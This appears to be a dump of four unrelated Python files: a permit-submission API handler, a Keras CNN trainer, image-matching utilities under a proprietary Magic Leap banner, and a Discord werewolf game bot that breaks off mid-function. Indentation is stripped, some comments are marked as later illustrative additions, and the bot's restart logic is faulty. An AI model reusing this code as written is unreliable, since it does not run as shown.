submission.py
|
"""Submission module"""
#pylint: disable=too-few-public-methods
import os
import sys
import json
import datetime
import threading
import falcon
import jsend
import sentry_sdk
from .dispatch_email import Email
from .dispatch_bluebeam import DispatchBluebeam
from .hooks import validate_access
from ..modules.util import timer
from ..modules.accela import Accela
from ..modules.formio import Formio
from ..modules.common import get_airtable, has_option_req
from ..transforms.submission_transform import SubmissionTransform
@falcon.before(validate_access)
class Submission():
"""Submission class"""
def on_post(self, req, resp):
#pylint: disable=no-self-use,too-many-locals,too-many-statements
"""
on post request
"""
if req.content_length:
data = req.stream.read(sys.maxsize)
data_json = json.loads(data)
with sentry_sdk.configure_scope() as scope:
scope.set_extra('data_json', data_json)
if 'id' in data_json:
# get submission json
submission_id = data_json['id']
accela_prj_id = "" # placeholder accela_prj variable
accela_sys_id = "" # placeholder accela_sys_id variable
enable_bluebeam = has_option_req(req, 'BLUEBEAM')
send_email = has_option_req(req, 'EMAIL')
with sentry_sdk.configure_scope() as scope:
scope.set_extra('enable_bluebeam', enable_bluebeam)
scope.set_extra('send_email', send_email)
submission_json = self.get_submission_json(submission_id)
# init airtable
airtable = get_airtable()
# log submission
insert = self.create_submission_airtable(airtable, submission_id, submission_json)
airtable_id = insert["id"]
# transform submission into record
record_json = SubmissionTransform().accela_transform(submission_json)
# send record to accela
response = Accela.send_record_to_accela(record_json)
with sentry_sdk.configure_scope() as scope:
scope.set_extra('accela_resp_status_code', response.status_code)
scope.set_extra('accela_resp_json', response.json())
if response.status_code == 200:
accela_json = response.json()
accela_prj_id = accela_json['result']['customId']
accela_sys_id = accela_json['result']['id']
self.update_submission_airtable(airtable, airtable_id, accela_json)
#pylint: disable=line-too-long
sentry_sdk.capture_message(
'ADU Intake {submission_id} {accela_env} {accela_prj_id} {accela_sys_id}'.format(
submission_id=submission_id,
accela_prj_id=accela_prj_id,
accela_sys_id=accela_sys_id,
accela_env=os.environ.get('ACCELA_ENV')
), 'info')
if enable_bluebeam:
accela_json['airtable'] = {"id": airtable_id}
# threading bluebeam submission
thread = threading.Thread(target=DispatchBluebeam.trigger_bluebeam_submission, args=(airtable_id, send_email))
thread.start()
else:
if send_email:
emails_sent = Email.send_submission_email_by_airtable_id(airtable_id)
response_emails = Accela.send_email_to_accela(
accela_json['result']['id'], emails_sent['EMAILS'])
accela_json['emails'] = response_emails.json()
msg = accela_json
resp.body = json.dumps(jsend.success(msg))
resp.status = falcon.HTTP_200
with sentry_sdk.configure_scope() as scope:
scope.set_extra('msg_json', msg)
#pylint: disable=line-too-long
sentry_sdk.capture_message(
'ADU Intake Success {submission_id} {accela_env} {accela_prj_id} {accela_sys_id}'.format(
submission_id=submission_id,
accela_prj_id=accela_prj_id,
accela_sys_id=accela_sys_id,
accela_env=os.environ.get('ACCELA_ENV')
), 'info')
return
with sentry_sdk.configure_scope() as scope:
scope.set_extra('accela_response_status_code', response.status_code)
scope.set_extra('accela_response_json', response.json())
# catch-all
resp.status = falcon.HTTP_400
msg = "The create record information is missing"
resp.body = json.dumps(jsend.error(msg))
sentry_sdk.capture_message('ADU Intake Error', 'error')
return
@staticmethod
@timer
def create_submission_airtable(airtable, submission_id, submission_json):
""" Create submission into AirTable """
return airtable.insert({
'FORMIO_ID': submission_id,
'SUBMISSION_DATE': submission_json['created'],
'PROJECT_ADDRESS': submission_json['data']['projectAddress'],
'FIRST_NAME': submission_json['data']['firstName'],
'LAST_NAME': submission_json['data']['lastName'],
'EMAIL': submission_json['data']['email'],
'NUM_PROPOSED_ADU': len(submission_json['data']['proposedAdUs']),
'SITE_PERMIT': submission_json['data']['sitePermit'],
'BLUEBEAM_UPLOADS': json.dumps(
SubmissionTransform().bluebeam_transform(submission_json)
),
'ACCELA_ENV': os.environ.get('ACCELA_ENV')
})
@staticmethod
@timer
def update_submission_airtable(airtable, airtable_id, accela_json):
""" Update submission into Airtable """
fields = {
'ACCELA_PRJ_ID': accela_json['result']['customId'],
'ACCELA_SYS_ID': accela_json['result']['id'],
'ACCELA_CREATED_DATE': datetime.datetime.now(datetime.timezone.utc).isoformat()
}
update = airtable.update(airtable_id, fields)
return update
@staticmethod
@timer
def get_submission_json(submission_id):
""" Get Submission JSON """
submission_json = Formio.get_formio_submission_by_id(
submission_id, form_id=os.environ.get('FORMIO_FORM_ID_ADU'))
return submission_json
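# Illustrative response envelopes for on_post above (following the jsend
# convention used by the `jsend` helpers; the actual payload depends on the
# Accela/Airtable responses):
#   success: {"status": "success", "data": {...Accela result, airtable id, emails...}}
#   error:   {"status": "error", "message": "The create record information is missing"}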
|
train-cnn.py
|
import sys
import numpy as np
import pprint
import time
import os
import argparse
import json
import hvutils as hv
import threading
import queue
from tqdm import tqdm
from random import shuffle
from keras import layers
from keras.models import Model, Sequential
from keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D, Dropout
from keras.utils import np_utils
from keras.callbacks import History
from keras.initializers import glorot_uniform
def makeModel(input_shape = (100,100,1), classes = 10):
#hv.set_tf_session_for_keras(memory_fraction=1.0)
X_input = Input(input_shape)
#X = ZeroPadding2D((3,3))(X_input)
X = Dropout(0.01)(X_input)
X = Conv2D(filters=3, kernel_size= (3,3), strides = (1,1), name='conv1', padding='valid', kernel_initializer='glorot_uniform')(X)
#X = BatchNormalization(axis = 3, name = 'bn_conv1')(X)
X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(3,3), strides=(2,2))(X)
X = Conv2D(filters=20, kernel_size=(5,5), strides = (1,1), name='conv2', padding='valid', kernel_initializer='glorot_uniform')(X)
#X = BatchNormalization(axis = 3, name = 'bn_conv2')(X)
X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(5,5), strides=(1,1))(X)
X = Conv2D(filters=30, kernel_size=(7,7), strides = (1,1), name='conv3', padding='valid', kernel_initializer='glorot_uniform')(X)
#X = BatchNormalization(axis = 3, name = 'bn_conv3')(X)
X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(2,2), strides=(1,1))(X)
# X = Conv2D(filters=512, kernel_size=(9,9), strides = (1,1), name='conv4', padding='valid', kernel_initializer='glorot_uniform')(X)
# X = BatchNormalization(axis = 3, name = 'bn_conv4')(X)
# X = Activation('relu')(X)
#X = MaxPooling2D(pool_size=(2,2), strides=(1,1))(X)
X = Flatten()(X)
X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform())(X)
model = Model(inputs = X_input, outputs = X, name = '4layers')
return model
def testModel(model, num_dev_files, dev_files_list, classes, mini_batch_size, imgdim):
num_mini_batches = num_dev_files // mini_batch_size
loss,acc = None, None
for bno in tqdm(range(0,num_mini_batches)):
X_test_orig, Y_test_orig = hv.load_minibatch(classes, dev_files_list, mini_batch_size, bno, imgdim)
X_test = X_test_orig/255
_, Y_test = hv.convert_to_one_hot(classes, Y_test_orig)
loss,acc = model.test_on_batch(X_test, Y_test)
print ("Loss [{}] Acc [{}] ".format(str(loss),str(acc)))
batch_data = queue.Queue()
def minibatchLoader(classes, train_files_list, num_mini_batches, mini_batch_size, bno, imgdim):
while bno < num_mini_batches:
while batch_data.qsize() > 50:
if threading.main_thread().is_alive() is False:
print("Main thread exited, data loader exiting")
return
#print("sleeping")
time.sleep(0.1)
X_train_orig, Y_train_orig = hv.load_minibatch(classes, train_files_list, mini_batch_size, bno, imgdim)
X = X_train_orig/255
_, Y = hv.convert_to_one_hot(classes, Y_train_orig)
batch_data.put((X,Y))
#print("loaded batch {}".format(bno))
bno += 1
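# minibatchLoader acts as a bounded producer for the training loop below: it
# keeps at most ~50 prepared (X, Y) batches in the shared `batch_data` queue,
# sleeps while the queue is full, and exits on its own once the main
# (training) thread has terminated; trainOnData consumes with batch_data.get().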
def trainOnData(dataPath, saveDest , train_loss, num_epochs, mini_batch_size, imgdim=(100,100,1)):
print("Making data set from path ", dataPath)
num_train_files, num_dev_files, tmp_keys, train_files_list, dev_files_list, classes = hv.make_dataset(dataPath, 0.2, imgdim)
num_mini_batches = num_train_files // mini_batch_size
print ("number of training examples = " + str(num_train_files))
print ("number of test examples = " + str(num_dev_files))
model = makeModel(imgdim, len(classes))
model.compile(loss=train_loss, optimizer='adam', metrics=['accuracy'])
for epoch in range(0, num_epochs):
#shuffle the file list
shuffle(train_files_list)
threading.Thread(target = minibatchLoader, args=(classes, train_files_list,num_mini_batches, mini_batch_size, 0, imgdim)).start()
print("\nEpoch {}/{}".format(epoch,num_epochs))
for bno in tqdm(range(0,num_mini_batches)):
#t_1 = time.time()
X,Y = batch_data.get()
#t_2 = time.time()
model.train_on_batch(X, Y)
#t_3 = time.time()
#print("Took [{}] s to load, and [{}] s to train on mini batch".format((t_2-t_1),(t_3-t_2)))
testModel(model, num_dev_files, dev_files_list, classes, mini_batch_size, imgdim)
#done with mini batches, now test
print("\nRunning final evaluation.....")
X_test_orig, Y_test_orig = hv.load_minibatch(classes, dev_files_list, num_dev_files, 0, imgdim)
X_test = X_test_orig/255
_, Y_test = hv.convert_to_one_hot(classes, Y_test_orig)
preds = model.evaluate(X_test, Y_test, batch_size=mini_batch_size)
print ("Loss = " + str(preds[0]))
print ("Test Accuracy = " + str(preds[1]))
hv.saveModel(model, saveDest, classes)
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-dp", "--data.path", required=True,
help="folder containing sub folders with images")
ap.add_argument("-dl", "--dest.loc", required=True,
help="where to save the trained model")
ap.add_argument("-iw", "--img.width", required=True,
help="width of the image")
ap.add_argument("-ih", "--img.height", required=True,
help="height of the image.")
ap.add_argument("-ic", "--img.chan", default=3,
help="channels in the image")
ap.add_argument("-te", "--train.epoch", default=2,
help="number of epochs")
ap.add_argument("-tl", "--train.loss", default='categorical_crossentropy',
help="loss function")
ap.add_argument("-mb", "--minibatch.size", default=1024,
help="size of images to include in each mini batch, keep to a multiple of 2")
args = vars(ap.parse_args())
imgdim = (int(args["img.height"]), int(args["img.width"]), int(args["img.chan"]))
trainOnData(args["data.path"], args["dest.loc"], args["train.loss"], int(args["train.epoch"]), int(args["minibatch.size"]),imgdim)
print("\n\nDone...")
|
utils.py
|
# %BANNER_BEGIN%
# ---------------------------------------------------------------------
# %COPYRIGHT_BEGIN%
#
# Magic Leap, Inc. ("COMPANY") CONFIDENTIAL
#
# Unpublished Copyright (c) 2020
# Magic Leap, Inc., All Rights Reserved.
#
# NOTICE: All information contained herein is, and remains the property
# of COMPANY. The intellectual and technical concepts contained herein
# are proprietary to COMPANY and may be covered by U.S. and Foreign
# Patents, patents in process, and are protected by trade secret or
# copyright law. Dissemination of this information or reproduction of
# this material is strictly forbidden unless prior written permission is
# obtained from COMPANY. Access to the source code contained herein is
# hereby forbidden to anyone except current COMPANY employees, managers
# or contractors who have executed Confidentiality and Non-disclosure
# agreements explicitly covering such access.
#
# The copyright notice above does not evidence any actual or intended
# publication or disclosure of this source code, which includes
# information that is confidential and/or proprietary, and is a trade
# secret, of COMPANY. ANY REPRODUCTION, MODIFICATION, DISTRIBUTION,
# PUBLIC PERFORMANCE, OR PUBLIC DISPLAY OF OR THROUGH USE OF THIS
# SOURCE CODE WITHOUT THE EXPRESS WRITTEN CONSENT OF COMPANY IS
# STRICTLY PROHIBITED, AND IN VIOLATION OF APPLICABLE LAWS AND
# INTERNATIONAL TREATIES. THE RECEIPT OR POSSESSION OF THIS SOURCE
# CODE AND/OR RELATED INFORMATION DOES NOT CONVEY OR IMPLY ANY RIGHTS
# TO REPRODUCE, DISCLOSE OR DISTRIBUTE ITS CONTENTS, OR TO MANUFACTURE,
# USE, OR SELL ANYTHING THAT IT MAY DESCRIBE, IN WHOLE OR IN PART.
#
# %COPYRIGHT_END%
# ----------------------------------------------------------------------
# %AUTHORS_BEGIN%
#
# Originating Authors: Paul-Edouard Sarlin
# Daniel DeTone
# Tomasz Malisiewicz
#
# %AUTHORS_END%
# --------------------------------------------------------------------*/
# %BANNER_END%
from pathlib import Path
import time
from collections import OrderedDict
from threading import Thread
import numpy as np
import cv2
import torch
import matplotlib.pyplot as plt
import matplotlib
matplotlib.use('Agg')
class AverageTimer:
""" Class to help manage printing simple timing of code execution. """
def __init__(self, smoothing=0.3, newline=False):
self.smoothing = smoothing
self.newline = newline
self.times = OrderedDict()
self.will_print = OrderedDict()
self.reset()
def reset(self):
now = time.time()
self.start = now
self.last_time = now
for name in self.will_print:
self.will_print[name] = False
def update(self, name='default'):
now = time.time()
dt = now - self.last_time
if name in self.times:
dt = self.smoothing * dt + (1 - self.smoothing) * self.times[name]
self.times[name] = dt
self.will_print[name] = True
self.last_time = now
def print(self, text='Timer'):
total = 0.
print('[{}]'.format(text), end=' ')
for key in self.times:
val = self.times[key]
if self.will_print[key]:
print('%s=%.3f' % (key, val), end=' ')
total += val
print('total=%.3f sec {%.1f FPS}' % (total, 1./total), end=' ')
if self.newline:
print(flush=True)
else:
print(end='\r', flush=True)
self.reset()
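# --- usage sketch (illustrative; not part of the original module) ---
# AverageTimer keeps an exponential moving average of each named stage and
# prints one smoothed summary line per iteration. The helper below is a
# minimal self-contained demo that uses sleeps in place of real work; it is
# never called by this module.
def _demo_average_timer(iterations=3):
    demo_timer = AverageTimer(newline=True)
    for _ in range(iterations):
        time.sleep(0.05)          # stand-in for a first processing stage
        demo_timer.update('stage1')
        time.sleep(0.02)          # stand-in for a second processing stage
        demo_timer.update('stage2')
        demo_timer.print('Demo')  # prints smoothed per-stage times plus total/FPS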
class VideoStreamer:
""" Class to help process image streams. Four types of possible inputs:"
1.) USB Webcam.
2.) An IP camera
3.) A directory of images (files in directory matching 'image_glob').
4.) A video file, such as an .mp4 or .avi file.
"""
def __init__(self, basedir, resize, skip, image_glob, max_length=1000000):
self._ip_grabbed = False
self._ip_running = False
self._ip_camera = False
self._ip_image = None
self._ip_index = 0
self.cap = []
self.camera = True
self.video_file = False
self.listing = []
self.resize = resize
self.interp = cv2.INTER_AREA
self.i = 0
self.skip = skip
self.max_length = max_length
if isinstance(basedir, int) or basedir.isdigit():
print('==> Processing USB webcam input: {}'.format(basedir))
self.cap = cv2.VideoCapture(int(basedir))
self.listing = range(0, self.max_length)
elif basedir.startswith(('http', 'rtsp')):
print('==> Processing IP camera input: {}'.format(basedir))
self.cap = cv2.VideoCapture(basedir)
self.start_ip_camera_thread()
self._ip_camera = True
self.listing = range(0, self.max_length)
elif Path(basedir).is_dir():
print('==> Processing image directory input: {}'.format(basedir))
self.listing = list(Path(basedir).glob(image_glob[0]))
for j in range(1, len(image_glob)):
image_path = list(Path(basedir).glob(image_glob[j]))
self.listing = self.listing + image_path
self.listing.sort()
self.listing = self.listing[::self.skip]
self.max_length = np.min([self.max_length, len(self.listing)])
if self.max_length == 0:
raise IOError('No images found (maybe bad \'image_glob\' ?)')
self.listing = self.listing[:self.max_length]
self.camera = False
elif Path(basedir).exists():
print('==> Processing video input: {}'.format(basedir))
self.cap = cv2.VideoCapture(basedir)
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 1)
num_frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
self.listing = range(0, num_frames)
self.listing = self.listing[::self.skip]
self.video_file = True
self.max_length = np.min([self.max_length, len(self.listing)])
self.listing = self.listing[:self.max_length]
else:
raise ValueError('VideoStreamer input \"{}\" not recognized.'.format(basedir))
if self.camera and not self.cap.isOpened():
raise IOError('Could not read camera')
def load_image(self, impath):
""" Read image as grayscale and resize to img_size.
Inputs
impath: Path to input image.
Returns
grayim: uint8 numpy array sized H x W.
"""
grayim = cv2.imread(impath, 0)
if grayim is None:
raise Exception('Error reading image %s' % impath)
w, h = grayim.shape[1], grayim.shape[0]
w_new, h_new = process_resize(w, h, self.resize)
grayim = cv2.resize(
grayim, (w_new, h_new), interpolation=self.interp)
return grayim
def next_frame(self):
""" Return the next frame, and increment internal counter.
Returns
image: Next H x W image.
status: True or False depending whether image was loaded.
"""
if self.i == self.max_length:
return (None, False)
if self.camera:
if self._ip_camera:
#Wait for first image, making sure we haven't exited
while self._ip_grabbed is False and self._ip_exited is False:
time.sleep(.001)
ret, image = self._ip_grabbed, self._ip_image.copy()
if ret is False:
self._ip_running = False
else:
ret, image = self.cap.read()
if ret is False:
print('VideoStreamer: Cannot get image from camera')
return (None, False)
w, h = image.shape[1], image.shape[0]
if self.video_file:
self.cap.set(cv2.CAP_PROP_POS_FRAMES, self.listing[self.i])
w_new, h_new = process_resize(w, h, self.resize)
image = cv2.resize(image, (w_new, h_new),
interpolation=self.interp)
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
else:
image_file = str(self.listing[self.i])
image = self.load_image(image_file)
self.i = self.i + 1
return (image, True)
def start_ip_camera_thread(self):
self._ip_thread = Thread(target=self.update_ip_camera, args=())
self._ip_running = True
self._ip_thread.start()
self._ip_exited = False
return self
def update_ip_camera(self):
while self._ip_running:
ret, img = self.cap.read()
if ret is False:
self._ip_running = False
self._ip_exited = True
self._ip_grabbed = False
return
self._ip_image = img
self._ip_grabbed = ret
self._ip_index += 1
#print('IPCAMERA THREAD got frame {}'.format(self._ip_index))
def cleanup(self):
self._ip_running = False
# --- PREPROCESSING ---
def process_resize(w, h, resize):
assert(len(resize) > 0 and len(resize) <= 2)
if len(resize) == 1 and resize[0] > -1:
scale = resize[0] / max(h, w)
w_new, h_new = int(round(w*scale)), int(round(h*scale))
elif len(resize) == 1 and resize[0] == -1:
w_new, h_new = w, h
else: # len(resize) == 2:
w_new, h_new = resize[0], resize[1]
# Issue warning if resolution is too small or too large.
if max(w_new, h_new) < 160:
print('Warning: input resolution is very small, results may vary')
elif max(w_new, h_new) > 2000:
print('Warning: input resolution is very large, results may vary')
return w_new, h_new
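# Worked examples for process_resize (illustrative, not part of the original
# module): one positive value rescales the longest side, a single -1 keeps the
# original size, and two values force an exact (width, height).
#   process_resize(1280, 720, [640])      -> (640, 360)
#   process_resize(1280, 720, [-1])       -> (1280, 720)
#   process_resize(1280, 720, [400, 300]) -> (400, 300)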
def frame2tensor(frame, device):
return torch.from_numpy(frame/255.).float()[None, None].to(device)
def read_image(path, device, resize, rotation, resize_float):
image = cv2.imread(str(path), cv2.IMREAD_GRAYSCALE)
if image is None:
return None, None, None
w, h = image.shape[1], image.shape[0]
w_new, h_new = process_resize(w, h, resize)
scales = (float(w) / float(w_new), float(h) / float(h_new))
if resize_float:
image = cv2.resize(image.astype('float32'), (w_new, h_new))
else:
image = cv2.resize(image, (w_new, h_new)).astype('float32')
if rotation != 0:
image = np.rot90(image, k=rotation)
if rotation % 2:
scales = scales[::-1]
inp = frame2tensor(image, device)
return image, inp, scales
# --- GEOMETRY ---
def estimate_pose(kpts0, kpts1, K0, K1, thresh, conf=0.99999):
if len(kpts0) < 5:
return None
f_mean = np.mean([K0[0, 0], K0[1, 1], K1[0, 0], K1[1, 1]])
norm_thresh = thresh / f_mean
kpts0 = (kpts0 - K0[[0, 1], [2, 2]][None]) / K0[[0, 1], [0, 1]][None]
kpts1 = (kpts1 - K1[[0, 1], [2, 2]][None]) / K1[[0, 1], [0, 1]][None]
E, mask = cv2.findEssentialMat(
kpts0, kpts1, np.eye(3), threshold=norm_thresh, prob=conf,
method=cv2.RANSAC)
assert E is not None
best_num_inliers = 0
ret = None
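# cv2.findEssentialMat can return several candidate essential matrices stacked
# vertically (a 3k x 3 array), so evaluate each 3x3 block with recoverPose and
# keep the candidate that yields the most inliers.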
for _E in np.split(E, len(E) / 3):
n, R, t, _ = cv2.recoverPose(
_E, kpts0, kpts1, np.eye(3), 1e9, mask=mask)
if n > best_num_inliers:
best_num_inliers = n
ret = (R, t[:, 0], mask.ravel() > 0)
return ret
def rotate_intrinsics(K, image_shape, rot):
"""image_shape is the shape of the image after rotation"""
assert rot <= 3
h, w = image_shape[:2][::-1 if (rot % 2) else 1]
fx, fy, cx, cy = K[0, 0], K[1, 1], K[0, 2], K[1, 2]
rot = rot % 4
if rot == 1:
return np.array([[fy, 0., cy],
[0., fx, w-1-cx],
[0., 0., 1.]], dtype=K.dtype)
elif rot == 2:
return np.array([[fx, 0., w-1-cx],
[0., fy, h-1-cy],
[0., 0., 1.]], dtype=K.dtype)
else: # if rot == 3:
return np.array([[fy, 0., h-1-cy],
[0., fx, cx],
[0., 0., 1.]], dtype=K.dtype)
def rotate_pose_inplane(i_T_w, rot):
rotation_matrices = [
np.array([[np.cos(r), -np.sin(r), 0., 0.],
[np.sin(r), np.cos(r), 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.]], dtype=np.float32)
for r in [np.deg2rad(d) for d in (0, 270, 180, 90)]
]
return np.dot(rotation_matrices[rot], i_T_w)
def scale_intrinsics(K, scales):
scales = np.diag([1./scales[0], 1./scales[1], 1.])
return np.dot(scales, K)
def to_homogeneous(points):
return np.concatenate([points, np.ones_like(points[:, :1])], axis=-1)
def compute_epipolar_error(kpts0, kpts1, T_0to1, K0, K1):
kpts0 = (kpts0 - K0[[0, 1], [2, 2]][None]) / K0[[0, 1], [0, 1]][None]
kpts1 = (kpts1 - K1[[0, 1], [2, 2]][None]) / K1[[0, 1], [0, 1]][None]
kpts0 = to_homogeneous(kpts0)
kpts1 = to_homogeneous(kpts1)
t0, t1, t2 = T_0to1[:3, 3]
t_skew = np.array([
[0, -t2, t1],
[t2, 0, -t0],
[-t1, t0, 0]
])
E = t_skew @ T_0to1[:3, :3]
Ep0 = kpts0 @ E.T # N x 3
p1Ep0 = np.sum(kpts1 * Ep0, -1) # N
Etp1 = kpts1 @ E # N x 3
d = p1Ep0**2 * (1.0 / (Ep0[:, 0]**2 + Ep0[:, 1]**2)
+ 1.0 / (Etp1[:, 0]**2 + Etp1[:, 1]**2))
return d
def angle_error_mat(R1, R2):
cos = (np.trace(np.dot(R1.T, R2)) - 1) / 2
cos = np.clip(cos, -1., 1.)  # numerical errors can make it out of bounds
return np.rad2deg(np.abs(np.arccos(cos)))
def angle_error_vec(v1, v2):
n = np.linalg.norm(v1) * np.linalg.norm(v2)
return np.rad2deg(np.arccos(np.clip(np.dot(v1, v2) / n, -1.0, 1.0)))
def compute_pose_error(T_0to1, R, t):
R_gt = T_0to1[:3, :3]
t_gt = T_0to1[:3, 3]
error_t = angle_error_vec(t, t_gt)
error_t = np.minimum(error_t, 180 - error_t) # ambiguity of E estimation
error_R = angle_error_mat(R, R_gt)
return error_t, error_R
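# pose_auc below integrates the recall-vs-error curve (trapezoid rule) up to
# each threshold t and normalises by t, so an estimator whose errors are all
# zero scores 1.0 at every threshold.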
def pose_auc(errors, thresholds):
sort_idx = np.argsort(errors)
errors = np.array(errors.copy())[sort_idx]
recall = (np.arange(len(errors)) + 1) / len(errors)
errors = np.r_[0., errors]
recall = np.r_[0., recall]
aucs = []
for t in thresholds:
last_index = np.searchsorted(errors, t)
r = np.r_[recall[:last_index], recall[last_index-1]]
e = np.r_[errors[:last_index], t]
aucs.append(np.trapz(r, x=e)/t)
return aucs
# --- VISUALIZATION ---
def plot_image_pair(imgs, dpi=100, size=6, pad=.5):
n = len(imgs)
assert n == 2, 'number of images must be two'
figsize = (size*n, size*3/4) if size is not None else None
_, ax = plt.subplots(1, n, figsize=figsize, dpi=dpi)
for i in range(n):
ax[i].imshow(imgs[i], cmap=plt.get_cmap('gray'), vmin=0, vmax=255)
ax[i].get_yaxis().set_ticks([])
ax[i].get_xaxis().set_ticks([])
for spine in ax[i].spines.values(): # remove frame
spine.set_visible(False)
plt.tight_layout(pad=pad)
def plot_keypoints(kpts0, kpts1, color='w', ps=2):
ax = plt.gcf().axes
ax[0].scatter(kpts0[:, 0], kpts0[:, 1], c=color, s=ps)
ax[1].scatter(kpts1[:, 0], kpts1[:, 1], c=color, s=ps)
def plot_matches(kpts0, kpts1, color, lw=1.5, ps=4):
fig = plt.gcf()
ax = fig.axes
fig.canvas.draw()
transFigure = fig.transFigure.inverted()
fkpts0 = transFigure.transform(ax[0].transData.transform(kpts0))
fkpts1 = transFigure.transform(ax[1].transData.transform(kpts1))
fig.lines = [matplotlib.lines.Line2D(
(fkpts0[i, 0], fkpts1[i, 0]), (fkpts0[i, 1], fkpts1[i, 1]), zorder=1,
transform=fig.transFigure, c=color[i], linewidth=lw)
for i in range(len(kpts0))]
ax[0].scatter(kpts0[:, 0], kpts0[:, 1], c=color, s=ps)
ax[1].scatter(kpts1[:, 0], kpts1[:, 1], c=color, s=ps)
def make_matching_plot(image0, image1, kpts0, kpts1, mkpts0, mkpts1,
color, text, path, show_keypoints=False,
fast_viz=False, opencv_display=False,
opencv_title='matches', small_text=[]):
if fast_viz:
make_matching_plot_fast(image0, image1, kpts0, kpts1, mkpts0, mkpts1,
color, text, path, show_keypoints, 10,
opencv_display, opencv_title, small_text)
return
plot_image_pair([image0, image1])
if show_keypoints:
plot_keypoints(kpts0, kpts1, color='k', ps=4)
plot_keypoints(kpts0, kpts1, color='w', ps=2)
plot_matches(mkpts0, mkpts1, color)
fig = plt.gcf()
txt_color = 'k' if image0[:100, :150].mean() > 200 else 'w'
fig.text(
0.01, 0.99, '\n'.join(text), transform=fig.axes[0].transAxes,
fontsize=15, va='top', ha='left', color=txt_color)
txt_color = 'k' if image0[-100:, :150].mean() > 200 else 'w'
fig.text(
0.01, 0.01, '\n'.join(small_text), transform=fig.axes[0].transAxes,
fontsize=5, va='bottom', ha='left', color=txt_color)
plt.savefig(str(path), bbox_inches='tight', pad_inches=0)
plt.close()
def make_matching_plot_fast(image0, image1, kpts0, kpts1, mkpts0,
mkpts1, color, text, path=None,
show_keypoints=False, margin=10,
opencv_display=False, opencv_title='',
small_text=[]):
H0, W0 = image0.shape
H1, W1 = image1.shape
H, W = max(H0, H1), W0 + W1 + margin
out = 255*np.ones((H, W), np.uint8)
out[:H0, :W0] = image0
out[:H1, W0+margin:] = image1
out = np.stack([out]*3, -1)
if show_keypoints:
kpts0, kpts1 = np.round(kpts0).astype(int), np.round(kpts1).astype(int)
white = (255, 255, 255)
black = (0, 0, 0)
for x, y in kpts0:
cv2.circle(out, (x, y), 2, black, -1, lineType=cv2.LINE_AA)
cv2.circle(out, (x, y), 1, white, -1, lineType=cv2.LINE_AA)
for x, y in kpts1:
cv2.circle(out, (x + margin + W0, y), 2, black, -1,
lineType=cv2.LINE_AA)
cv2.circle(out, (x + margin + W0, y), 1, white, -1,
lineType=cv2.LINE_AA)
mkpts0, mkpts1 = np.round(mkpts0).astype(int), np.round(mkpts1).astype(int)
color = (np.array(color[:, :3])*255).astype(int)[:, ::-1]
for (x0, y0), (x1, y1), c in zip(mkpts0, mkpts1, color):
c = c.tolist()
rc = (np.random.randint(32,196), np.random.randint(32,196), np.random.randint(32,196))
cv2.line(out, (x0, y0), (x1 + margin + W0, y1),
color=rc, thickness=1, lineType=cv2.LINE_AA)
# display line end-points as circles
cv2.circle(out, (x0, y0), 2, c, -1, lineType=cv2.LINE_AA)
cv2.circle(out, (x1 + margin + W0, y1), 2, c, -1,
lineType=cv2.LINE_AA)
# Scale factor for consistent visualization across scales.
sc = min(H / 640., 2.0)
# Big text.
Ht = int(30 * sc) # text height
txt_color_fg = (255, 255, 255)
txt_color_bg = (0, 0, 0)
for i, t in enumerate(text):
cv2.putText(out, t, (int(8*sc), Ht*(i+1)), cv2.FONT_HERSHEY_DUPLEX,
1.0*sc, txt_color_bg, 2, cv2.LINE_AA)
cv2.putText(out, t, (int(8*sc), Ht*(i+1)), cv2.FONT_HERSHEY_DUPLEX,
1.0*sc, txt_color_fg, 1, cv2.LINE_AA)
# Small text.
Ht = int(18 * sc) # text height
for i, t in enumerate(reversed(small_text)):
cv2.putText(out, t, (int(8*sc), int(H-Ht*(i+.6))), cv2.FONT_HERSHEY_DUPLEX,
0.5*sc, txt_color_bg, 2, cv2.LINE_AA)
cv2.putText(out, t, (int(8*sc), int(H-Ht*(i+.6))), cv2.FONT_HERSHEY_DUPLEX,
0.5*sc, txt_color_fg, 1, cv2.LINE_AA)
if path is not None:
cv2.imwrite(str(path), out)
if opencv_display:
cv2.imshow(opencv_title, out)
cv2.waitKey(1)
return out
def error_colormap(x):
return np.clip(
np.stack([2-x*2, x*2, np.zeros_like(x), np.ones_like(x)], -1), 0, 1)
|
run_Bot.py
|
#===== description =====#
"""
DiscordJinroGame
Copyright (c) 2018 brave99
This software is released under the MIT License.
http://opensource.org/licenses/mit-license.php
This script is a discord bot that can be a GM of OneNightJinro game.
The only required library is "discord.py".
Have fun with your BOT!!
English version is coming soon...
"""
#===== modules =====#
import discord
from time import sleep
from threading import Thread, Event
from queue import Queue
import configparser
import random
#===== global =====#
config = configparser.ConfigParser()
config.read('option.ini', encoding = 'utf8')
client = discord.Client()
GAME = discord.Game(name = "OneNightJinro")
CHANNEL = None#discord.channel(id=config["BOT"]["CHANNEL"])
STARTED = False
STATEMENT = "hoge"
send = Queue()
receive = Queue()
#receive for discord to game, send for game to discord
#===== gameplay =====#
players = []
#===== script =====#
#===== bot =====#
@client.event
async def on_ready():
global CHANNEL
CHANNEL = client.get_channel(config["BOT"]["CHANNEL"])
print('Logged in as')
print(client.user.name)
print(client.user.id)
print(CHANNEL)
print('------')
await client.send_message(CHANNEL, 'ブンブンハローDISCORD')
await client.send_message(CHANNEL, '"/start" でゲームを開始します。\n"/restart"で再起動、"/shutdown"で終了します。')
@client.event
async def on_message(message):
global STARTED
global CHANNEL
global players
if message.content.startswith("/restart"):
await client.send_message(message.channel, "I'll be back...")
client.change_presence(game = None)
client.logout()
client.close()
sleep(3)
client.run(config["BOT"]["TOKEN"])
STARTED = False
players = []
elif message.content.startswith("/shutdown"):
if client.user != message.author:
await client.send_message(message.channel, "Bye!!")
await client.close()
await client.logout()
exit(0)
if not STARTED:
if message.content.startswith("/start"):
if client.user != message.author:
await client.send_message(CHANNEL, "ワンナイト人狼ゲームを始めます。")
await client.change_presence(game = GAME)
